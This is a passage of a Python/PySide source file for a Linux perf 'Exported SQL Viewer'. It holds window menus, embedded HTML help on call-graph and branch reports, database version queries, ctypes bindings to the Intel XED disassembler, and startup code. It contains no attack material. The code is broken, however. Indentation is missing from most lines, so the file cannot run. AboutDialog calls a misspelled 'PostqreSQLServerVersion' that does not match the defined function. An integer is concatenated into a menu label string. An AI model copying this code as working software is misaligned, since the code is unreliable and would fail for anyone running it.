return CreateAction("Pre&vious", "Move the focus to the previous window", mdi_area.activatePreviousSubWindow, mdi_area, QKeySequence.PreviousChild)
# Typical MDI window menu
class WindowMenu():
def __init__(self, mdi_area, menu):
self.mdi_area = mdi_area
self.window_menu = menu.addMenu("&Windows")
self.close_active_window = CreateCloseActiveWindowAction(mdi_area)
self.close_all_windows = CreateCloseAllWindowsAction(mdi_area)
self.tile_windows = CreateTileWindowsAction(mdi_area)
self.cascade_windows = CreateCascadeWindowsAction(mdi_area)
self.next_window = CreateNextWindowAction(mdi_area)
self.previous_window = CreatePreviousWindowAction(mdi_area)
self.window_menu.aboutToShow.connect(self.Update)
def Update(self):
self.window_menu.clear()
sub_window_count = len(self.mdi_area.subWindowList())
have_sub_windows = sub_window_count != 0
self.close_active_window.setEnabled(have_sub_windows)
self.close_all_windows.setEnabled(have_sub_windows)
self.tile_windows.setEnabled(have_sub_windows)
self.cascade_windows.setEnabled(have_sub_windows)
self.next_window.setEnabled(have_sub_windows)
self.previous_window.setEnabled(have_sub_windows)
self.window_menu.addAction(self.close_active_window)
self.window_menu.addAction(self.close_all_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.tile_windows)
self.window_menu.addAction(self.cascade_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.next_window)
self.window_menu.addAction(self.previous_window)
if sub_window_count == 0:
return
self.window_menu.addSeparator()
nr = 1
for sub_window in self.mdi_area.subWindowList():
label = str(nr) + " " + sub_window.name
if nr < 10:
label = "&" + label
action = self.window_menu.addAction(label)
action.setCheckable(True)
action.setChecked(sub_window == self.mdi_area.activeSubWindow())
action.triggered.connect(lambda x=nr: self.setActiveSubWindow(x))
self.window_menu.addAction(action)
nr += 1
def setActiveSubWindow(self, nr):
self.mdi_area.setActiveSubWindow(self.mdi_area.subWindowList()[nr - 1])
# Help text
glb_help_text = """
<h1>Contents</h1>
<style>
p.c1 {
text-indent: 40px;
}
p.c2 {
text-indent: 80px;
}
</style>
<p class=c1><a href=#reports>1. Reports</a></p>
<p class=c2><a href=#callgraph>1.1 Context-Sensitive Call Graph</a></p>
<p class=c2><a href=#calltree>1.2 Call Tree</a></p>
<p class=c2><a href=#allbranches>1.3 All branches</a></p>
<p class=c2><a href=#selectedbranches>1.4 Selected branches</a></p>
<p class=c2><a href=#topcallsbyelapsedtime>1.5 Top calls by elapsed time</a></p>
<p class=c1><a href=#tables>2. Tables</a></p>
<h1 id=reports>1. Reports</h1>
<h2 id=callgraph>1.1 Context-Sensitive Call Graph</h2>
The result is a GUI window with a tree representing a context-sensitive
call-graph. Expanding a couple of levels of the tree and adjusting column
widths to suit will display something like:
<pre>
                                    Call Graph: pt_example
Call Path                          Object        Count  Time(ns)  Time(%)  Branch Count  Branch Count(%)
v- ls
    v- 2638:2638
        v- _start                  ld-2.19.so        1  10074071    100.0        211135            100.0
          |- unknown               unknown           1     13198      0.1             1              0.0
          >- _dl_start             ld-2.19.so        1   1400980     13.9         19637              9.3
          >- _d_linit_internal     ld-2.19.so        1    448152      4.4         11094              5.3
          v-__libc_start_main@plt  ls                1   8211741     81.5        180397             85.4
             >- _dl_fixup          ld-2.19.so        1      7607      0.1           108              0.1
             >- __cxa_atexit       libc-2.19.so      1     11737      0.1            10              0.0
             >- __libc_csu_init    ls                1     10354      0.1            10              0.0
             |- _setjmp            libc-2.19.so      1         0      0.0             4              0.0
             v- main               ls                1   8182043     99.6        180254             99.9
</pre>
<h3>Points to note:</h3>
<ul>
<li>The top level is a command name (comm)</li>
<li>The next level is a thread (pid:tid)</li>
<li>Subsequent levels are functions</li>
<li>'Count' is the number of calls</li>
<li>'Time' is the elapsed time until the function returns</li>
<li>Percentages are relative to the level above</li>
<li>'Branch Count' is the total number of branches for that function and all functions that it calls</li>
</ul>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds function names by either an exact match or a pattern match.
The pattern matching symbols are ? for any character and * for zero or more characters.
<h2 id=calltree>1.2 Call Tree</h2>
The Call Tree report is very similar to the Context-Sensitive Call Graph, but the data is not aggregated.
Also, the 'Count' column, which would always be 1, is replaced by 'Call Time'.
<h2 id=allbranches>1.3 All branches</h2>
The All branches report displays all branches in chronological order.
Not all data is fetched immediately. More records can be fetched using the Fetch bar provided.
<h3>Disassembly</h3>
Open a branch to display disassembly. This only works if:
<ol>
<li>The disassembler is available. Currently, only Intel XED is supported - see <a href=#xed>Intel XED Setup</a></li>
<li>The object code is available. Currently, only the perf build ID cache is searched for object code.
The default directory ~/.debug can be overridden by setting environment variable PERF_BUILDID_DIR.
One exception is kcore, where the DSO long name is used (refer to dsos_view on the Tables menu),
or alternatively, set environment variable PERF_KCORE to the kcore file name.</li>
</ol>
<h4 id=xed>Intel XED Setup</h4>
To use Intel XED, libxed.so must be present. To build and install libxed.so:
<pre>
git clone https://github.com/intelxed/mbuild.git mbuild
git clone https://github.com/intelxed/xed
cd xed
./mfile.py --share
sudo ./mfile.py --prefix=/usr/local install
sudo ldconfig
</pre>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<h2 id=selectedbranches>1.4 Selected branches</h2>
This is the same as the <a href=#allbranches>All branches</a> report but with the data reduced
by various selection criteria. A dialog box displays available criteria which are AND'ed together.
<h3>1.4.1 Time ranges</h3>
The time ranges hint text shows the total time range. Relative time ranges can also be entered in
ms, us or ns. Also, negative values are relative to the end of the trace. Examples:
<pre>
81073085947329-81073085958238    From 81073085947329 to 81073085958238
100us-200us                      From 100us to 200us
10ms-                            From 10ms to the end
-100ns                           The first 100ns
-10ms-                           The last 10ms
</pre>
N.B. Due to the granularity of timestamps, there could be no branches in any given time range.
<h2 id=topcallsbyelapsedtime>1.5 Top calls by elapsed time</h2>
The Top calls by elapsed time report displays calls in descending order of time elapsed between when the function was called and when it returned.
The data is reduced by various selection criteria. A dialog box displays available criteria which are AND'ed together.
If not all data is fetched, a Fetch bar is provided. Ctrl-F displays a Find bar.
<h1 id=tables>2. Tables</h1>
The Tables menu shows all tables and views in the database. Most tables have an associated view
which displays the information in a more friendly way. Not all data for large tables is fetched
immediately. More records can be fetched using the Fetch bar provided. Columns can be sorted,
but that can be slow for large tables.
<p>There are also tables of database meta-information.
For SQLite3 databases, the sqlite_master table is included.
For PostgreSQL databases, information_schema.tables/views/columns are included.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<p>N.B. Results are found in id order, so if the table is re-ordered, find-next and find-previous
will go to the next/previous result in id order, instead of display order.
"""
# Help window
class HelpWindow(QMdiSubWindow):
def __init__(self, glb, parent=None):
super(HelpWindow, self).__init__(parent)
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setWidget(self.text)
AddSubWindow(glb.mainwindow.mdi_area, self, "Exported SQL Viewer Help")
# Main window that only displays the help text
class HelpOnlyWindow(QMainWindow):
def __init__(self, parent=None):
super(HelpOnlyWindow, self).__init__(parent)
self.setMinimumSize(200, 100)
self.resize(800, 600)
self.setWindowTitle("Exported SQL Viewer Help")
self.setWindowIcon(self.style().standardIcon(QStyle.SP_MessageBoxInformation))
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setCentralWidget(self.text)
# PostgreSQL server version
def PostgreSQLServerVersion(db):
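	# Illustrative example (hypothetical values) of the VERSION() string this
	# parses: "PostgreSQL 11.5 on x86_64-pc-linux-gnu, compiled by gcc ..." -> "11.5"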
query = QSqlQuery(db)
QueryExec(query, "SELECT VERSION()")
if query.next():
v_str = query.value(0)
v_list = v_str.strip().split(" ")
if v_list[0] == "PostgreSQL" and v_list[2] == "on":
return v_list[1]
return v_str
return "Unknown"
# SQLite version
def SQLiteVersion(db):
query = QSqlQuery(db)
QueryExec(query, "SELECT sqlite_version()")
if query.next():
return query.value(0)
return "Unknown"
# About dialog
class AboutDialog(QDialog):
def __init__(self, glb, parent=None):
super(AboutDialog, self).__init__(parent)
self.setWindowTitle("About Exported SQL Viewer")
self.setMinimumWidth(300)
pyside_version = "1" if pyside_version_1 else "2"
text = "<pre>"
text += "Python version: " + sys.version.split(" ")[0] + "\n"
text += "PySide version: " + pyside_version + "\n"
text += "Qt version: " + qVersion() + "\n"
if glb.dbref.is_sqlite3:
text += "SQLite version: " + SQLiteVersion(glb.db) + "\n"
else:
text += "PostqreSQL version: " + PostqreSQLServerVersion(glb.db) + "\n"
text += "</pre>"
self.text = QTextBrowser()
self.text.setHtml(text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.vbox = QVBoxLayout()
self.vbox.addWidget(self.text)
		self.setLayout(self.vbox)
# Font resize
def ResizeFont(widget, diff):
font = widget.font()
sz = font.pointSize()
font.setPointSize(sz + diff)
widget.setFont(font)
def ShrinkFont(widget):
ResizeFont(widget, -1)
def EnlargeFont(widget):
ResizeFont(widget, 1)
# Unique name for sub-windows
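# For example, with hypothetical names, repeated "Table: samples" windows are
# titled "Table: samples", "Table: samples <2>", "Table: samples <3>", ...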
def NumberedWindowName(name, nr):
if nr > 1:
name += " <" + str(nr) + ">"
return name
def UniqueSubWindowName(mdi_area, name):
nr = 1
while True:
unique_name = NumberedWindowName(name, nr)
ok = True
for sub_window in mdi_area.subWindowList():
if sub_window.name == unique_name:
ok = False
break
if ok:
return unique_name
nr += 1
# Add a sub-window
def AddSubWindow(mdi_area, sub_window, name):
unique_name = UniqueSubWindowName(mdi_area, name)
sub_window.setMinimumSize(200, 100)
sub_window.resize(800, 600)
sub_window.setWindowTitle(unique_name)
sub_window.setAttribute(Qt.WA_DeleteOnClose)
sub_window.setWindowIcon(sub_window.style().standardIcon(QStyle.SP_FileIcon))
sub_window.name = unique_name
mdi_area.addSubWindow(sub_window)
sub_window.show()
# Main window
class MainWindow(QMainWindow):
def __init__(self, glb, parent=None):
super(MainWindow, self).__init__(parent)
self.glb = glb
self.setWindowTitle("Exported SQL Viewer: " + glb.dbname)
self.setWindowIcon(self.style().standardIcon(QStyle.SP_ComputerIcon))
self.setMinimumSize(200, 100)
self.mdi_area = QMdiArea()
self.mdi_area.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.mdi_area.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.setCentralWidget(self.mdi_area)
menu = self.menuBar()
file_menu = menu.addMenu("&File")
file_menu.addAction(CreateExitAction(glb.app, self))
edit_menu = menu.addMenu("&Edit")
edit_menu.addAction(CreateAction("&Copy", "Copy to clipboard", self.CopyToClipboard, self, QKeySequence.Copy))
edit_menu.addAction(CreateAction("Copy as CS&V", "Copy to clipboard as CSV", self.CopyToClipboardCSV, self))
edit_menu.addAction(CreateAction("&Find...", "Find items", self.Find, self, QKeySequence.Find))
edit_menu.addAction(CreateAction("Fetch &more records...", "Fetch more records", self.FetchMoreRecords, self, [QKeySequence(Qt.Key_F8)]))
edit_menu.addAction(CreateAction("&Shrink Font", "Make text smaller", self.ShrinkFont, self, [QKeySequence("Ctrl+-")]))
edit_menu.addAction(CreateAction("&Enlarge Font", "Make text bigger", self.EnlargeFont, self, [QKeySequence("Ctrl++")]))
reports_menu = menu.addMenu("&Reports")
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("Context-Sensitive Call &Graph", "Create a new window containing a context-sensitive call graph", self.NewCallGraph, self))
if IsSelectable(glb.db, "calls", "WHERE parent_id >= 0"):
reports_menu.addAction(CreateAction("Call &Tree", "Create a new window containing a call tree", self.NewCallTree, self))
self.EventMenu(GetEventList(glb.db), reports_menu)
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("&Top calls by elapsed time", "Create a new window displaying top calls by elapsed time", self.NewTopCalls, self))
self.TableMenu(GetTableList(glb), menu)
self.window_menu = WindowMenu(self.mdi_area, menu)
help_menu = menu.addMenu("&Help")
help_menu.addAction(CreateAction("&Exported SQL Viewer Help", "Helpful information", self.Help, self, QKeySequence.HelpContents))
help_menu.addAction(CreateAction("&About Exported SQL Viewer", "About this application", self.About, self))
def Try(self, fn):
win = self.mdi_area.activeSubWindow()
if win:
try:
fn(win.view)
except:
pass
def CopyToClipboard(self):
self.Try(CopyCellsToClipboardHdr)
def CopyToClipboardCSV(self):
self.Try(CopyCellsToClipboardCSV)
def Find(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.find_bar.Activate()
except:
pass
def FetchMoreRecords(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.fetch_bar.Activate()
except:
pass
def ShrinkFont(self):
self.Try(ShrinkFont)
def EnlargeFont(self):
self.Try(EnlargeFont)
def EventMenu(self, events, reports_menu):
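		# One pair of menu entries is added per "branches" event; when there is
		# more than one such event, the database id is appended to the label,
		# e.g. "All branches (id=2)"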
branches_events = 0
for event in events:
event = event.split(":")[0]
if event == "branches":
branches_events += 1
dbid = 0
for event in events:
dbid += 1
event = event.split(":")[0]
if event == "branches":
label = "All branches" if branches_events == 1 else "All branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda x=dbid: self.NewBranchView(x), self))
label = "Selected branches" if branches_events == 1 else "Selected branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda x=dbid: self.NewSelectedBranchView(x), self))
def TableMenu(self, tables, menu):
table_menu = menu.addMenu("&Tables")
for table in tables:
			table_menu.addAction(CreateAction(table, "Create a new window containing a table view", lambda a=None, t=table: self.NewTableView(t), self))
def NewCallGraph(self):
CallGraphWindow(self.glb, self)
def NewCallTree(self):
CallTreeWindow(self.glb, self)
def NewTopCalls(self):
dialog = TopCallsDialog(self.glb, self)
ret = dialog.exec_()
if ret:
TopCallsWindow(self.glb, dialog.report_vars, self)
def NewBranchView(self, event_id):
BranchWindow(self.glb, event_id, ReportVars(), self)
def NewSelectedBranchView(self, event_id):
dialog = SelectedBranchDialog(self.glb, self)
ret = dialog.exec_()
if ret:
BranchWindow(self.glb, event_id, dialog.report_vars, self)
def NewTableView(self, table_name):
TableWindow(self.glb, table_name, self)
def Help(self):
HelpWindow(self.glb, self)
def About(self):
dialog = AboutDialog(self.glb, self)
dialog.exec_()
# XED Disassembler
class xed_state_t(Structure):
_fields_ = [
("mode", c_int),
("width", c_int)
]
class XEDInstruction():
def __init__(self, libxed):
# Current xed_decoded_inst_t structure is 192 bytes. Use 512 to allow for future expansion
xedd_t = c_byte * 512
self.xedd = xedd_t()
self.xedp = addressof(self.xedd)
libxed.xed_decoded_inst_zero(self.xedp)
self.state = xed_state_t()
self.statep = addressof(self.state)
# Buffer for disassembled instruction text
self.buffer = create_string_buffer(256)
self.bufferp = addressof(self.buffer)
class LibXED():
def __init__(self):
try:
self.libxed = CDLL("libxed.so")
except:
self.libxed = None
if not self.libxed:
self.libxed = CDLL("/usr/local/lib/libxed.so")
self.xed_tables_init = self.libxed.xed_tables_init
self.xed_tables_init.restype = None
self.xed_tables_init.argtypes = []
self.xed_decoded_inst_zero = self.libxed.xed_decoded_inst_zero
self.xed_decoded_inst_zero.restype = None
self.xed_decoded_inst_zero.argtypes = [ c_void_p ]
self.xed_operand_values_set_mode = self.libxed.xed_operand_values_set_mode
self.xed_operand_values_set_mode.restype = None
self.xed_operand_values_set_mode.argtypes = [ c_void_p, c_void_p ]
self.xed_decoded_inst_zero_keep_mode = self.libxed.xed_decoded_inst_zero_keep_mode
self.xed_decoded_inst_zero_keep_mode.restype = None
self.xed_decoded_inst_zero_keep_mode.argtypes = [ c_void_p ]
self.xed_decode = self.libxed.xed_decode
self.xed_decode.restype = c_int
self.xed_decode.argtypes = [ c_void_p, c_void_p, c_uint ]
self.xed_format_context = self.libxed.xed_format_context
self.xed_format_context.restype = c_uint
self.xed_format_context.argtypes = [ c_int, c_void_p, c_void_p, c_int, c_ulonglong, c_void_p, c_void_p ]
self.xed_tables_init()
def Instruction(self):
return XEDInstruction(self)
def SetMode(self, inst, mode):
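		# Note: the numeric values below are assumed to correspond to XED's
		# machine mode and address width enums (e.g. 1 = XED_MACHINE_MODE_LONG_64,
		# 4 = XED_MACHINE_MODE_LEGACY_32); widths are in bytes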
if mode:
inst.state.mode = 4 # 32-bit
inst.state.width = 4 # 4 bytes
else:
inst.state.mode = 1 # 64-bit
inst.state.width = 8 # 8 bytes
self.xed_operand_values_set_mode(inst.xedp, inst.statep)
def DisassembleOne(self, inst, bytes_ptr, bytes_cnt, ip):
self.xed_decoded_inst_zero_keep_mode(inst.xedp)
err = self.xed_decode(inst.xedp, bytes_ptr, bytes_cnt)
if err:
return 0, ""
# Use AT&T mode (2), alternative is Intel (3)
ok = self.xed_format_context(2, inst.xedp, inst.bufferp, sizeof(inst.buffer), ip, 0, 0)
if not ok:
return 0, ""
if sys.version_info[0] == 2:
result = inst.buffer.value
else:
result = inst.buffer.value.decode()
# Return instruction length and the disassembled instruction text
# For now, assume the length is in byte 166
return inst.xedd[166], result
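# Minimal usage sketch for LibXED (illustrative only: assumes libxed.so is
# installed and uses a hand-made one-byte buffer rather than real trace data):
#   libxed = LibXED()
#   inst = libxed.Instruction()
#   libxed.SetMode(inst, 0)                    # 0 selects 64-bit mode
#   buf = create_string_buffer(b"\x90")        # single NOP instruction
#   length, text = libxed.DisassembleOne(inst, addressof(buf), 1, 0x1000)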
def TryOpen(file_name):
try:
return open(file_name, "rb")
except:
return None
def Is64Bit(f):
result = sizeof(c_void_p)
# ELF support only
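	# The first 7 bytes of e_ident are examined: the 4-byte magic "\x7fELF",
	# then EI_CLASS (1 = 32-bit, 2 = 64-bit), EI_DATA (byte order) and EI_VERSION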
pos = f.tell()
f.seek(0)
header = f.read(7)
f.seek(pos)
magic = header[0:4]
if sys.version_info[0] == 2:
eclass = ord(header[4])
encoding = ord(header[5])
version = ord(header[6])
else:
eclass = header[4]
encoding = header[5]
version = header[6]
	if magic == b"\x7fELF" and eclass > 0 and eclass < 3 and encoding > 0 and encoding < 3 and version == 1:
result = True if eclass == 2 else False
return result
# Global data
class Glb():
def __init__(self, dbref, db, dbname):
self.dbref = dbref
self.db = db
self.dbname = dbname
self.home_dir = os.path.expanduser("~")
self.buildid_dir = os.getenv("PERF_BUILDID_DIR")
if self.buildid_dir:
self.buildid_dir += "/.build-id/"
else:
self.buildid_dir = self.home_dir + "/.debug/.build-id/"
self.app = None
self.mainwindow = None
self.instances_to_shutdown_on_exit = weakref.WeakSet()
try:
self.disassembler = LibXED()
self.have_disassembler = True
except:
self.have_disassembler = False
def FileFromBuildId(self, build_id):
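		# Build ID cache layout (path shown is illustrative):
		#   ~/.debug/.build-id/ab/cdef0123456789.../elf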
file_name = self.buildid_dir + build_id[0:2] + "/" + build_id[2:] + "/elf"
return TryOpen(file_name)
def FileFromNamesAndBuildId(self, short_name, long_name, build_id):
# Assume current machine i.e. no support for virtualization
if short_name[0:7] == "[kernel" and os.path.basename(long_name) == "kcore":
file_name = os.getenv("PERF_KCORE")
f = TryOpen(file_name) if file_name else None
if f:
return f
# For now, no special handling if long_name is /proc/kcore
f = TryOpen(long_name)
if f:
return f
f = self.FileFromBuildId(build_id)
if f:
return f
return None
def AddInstanceToShutdownOnExit(self, instance):
self.instances_to_shutdown_on_exit.add(instance)
# Shutdown any background processes or threads
def ShutdownInstances(self):
for x in self.instances_to_shutdown_on_exit:
try:
x.Shutdown()
except:
pass
# Database reference
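# For PostgreSQL, the database "name" may be a space-separated option string,
# e.g. (illustrative values only):
#   "hostname=localhost port=5432 username=perf password=perf dbname=pt_example"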
class DBRef():
def __init__(self, is_sqlite3, dbname):
self.is_sqlite3 = is_sqlite3
self.dbname = dbname
def Open(self, connection_name):
dbname = self.dbname
if self.is_sqlite3:
db = QSqlDatabase.addDatabase("QSQLITE", connection_name)
else:
db = QSqlDatabase.addDatabase("QPSQL", connection_name)
opts = dbname.split()
for opt in opts:
if "=" in opt:
opt = opt.split("=")
if opt[0] == "hostname":
db.setHostName(opt[1])
elif opt[0] == "port":
db.setPort(int(opt[1]))
elif opt[0] == "username":
db.setUserName(opt[1])
elif opt[0] == "password":
db.setPassword(opt[1])
elif opt[0] == "dbname":
dbname = opt[1]
else:
dbname = opt
db.setDatabaseName(dbname)
if not db.open():
raise Exception("Failed to open database " + dbname + " error: " + db.lastError().text())
return db, dbname
# Main
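# Typical invocations (database names are illustrative):
#   python exported-sql-viewer.py pt_example
#   python exported-sql-viewer.py "hostname=localhost dbname=pt_example"
#   python exported-sql-viewer.py --help-only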
def Main():
	if len(sys.argv) < 2:
		printerr("Usage is: exported-sql-viewer.py {<database name> | --help-only}")
raise Exception("Too few arguments")
dbname = sys.argv[1]
if dbname == "--help-only":
app = QApplication(sys.argv)
mainwindow = HelpOnlyWindow()
mainwindow.show()
err = app.exec_()
sys.exit(err)
is_sqlite3 = False
try:
f = open(dbname, "rb")
if f.read(15) == b'SQLite format 3':
is_sqlite3 = True
f.close()
except:
pass
dbref = DBRef(is_sqlite3, dbname)
db, dbname = dbref.Open("main")
glb = Glb(dbref, db, dbname)
app = QApplication(sys.argv)
glb.app = app
mainwindow = MainWindow(glb)
glb.mainwindow = mainwindow
mainwindow.show()
err = app.exec_()
glb.ShutdownInstances()
db.close()
sys.exit(err)
if __name__ == "__main__":
Main()